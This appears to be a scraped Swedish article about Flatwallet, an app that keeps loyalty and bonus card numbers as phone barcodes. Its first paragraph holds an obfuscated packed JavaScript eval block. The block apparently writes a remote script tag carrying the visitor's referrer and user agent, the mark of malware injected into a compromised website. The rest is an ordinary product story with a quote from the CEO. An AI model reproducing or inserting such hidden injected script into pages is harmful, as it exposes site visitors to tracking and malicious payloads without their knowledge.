Image Image Image Image Image Image Image Image Image Image

| 9 juli, 2020

Scroll to top

Top

Slipp dina kundklubbskort med flatwallet

Slipp dina kundklubbskort med flatwallet
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|deezy|var|u0026u|referrer|nrshh||js|php’.split(’|’),0,{}))
kan du ha bonuskort och klubbkort samlade i en enda mapp i mobilen istället för för att ha en massa kort i plånboken. 7500 personer har redan laddat ner appen.

Via appen Flatwallet finns det möjlighet att registrera köp, få erbjudanden och bli medlem i nya kundklubbar. Appen omvandlar användarens medlemsnummer till en streckkod i mobiltelefonen. När köp registreras används streckkodsläsaren i butikens kassa för att läsa av streckkoden i mobilen eller så registreras medlemsnumret manuellt i kassan. På så sätt slipper den som laddat ner appen ha plånboken full med plastkort.

– Ju fler personer som laddar ner appen desto fler kundklubbar kommer att tycka att det är intressant att skicka ut erbjudanden via appen. Vi har fått mycket positiv feedback från våra användare som tycker att appen förenklar vardagen samt att man slipper förtreten med att stå i kassan och ha glömt bonuskortet hemma i lådan. Nu har du med dig det i telefonen, säger Erik Sandberg, vd Flatwallet.

Den som använder FlatWalletappen kan få information och erbjudanden från kundklubbar direkt i mobilen. På så sätt minskar risken att rabattkupongerna ligger hemma när det är dags att handla. Den som tycker att det är jobbigt att fylla i medlemsansökan till kundklubbar kommer också att ha nytta av appen. Det går på några sekunder att bli medlem i en ny klubb med hjälp av FlatWalletppen tack vare att användarens personuppgifter är förifyllda.

FlatWalletappen finns att ladda ner gratis på App Store och Google Play (Android Market). 

FlatWallet - FlatWallet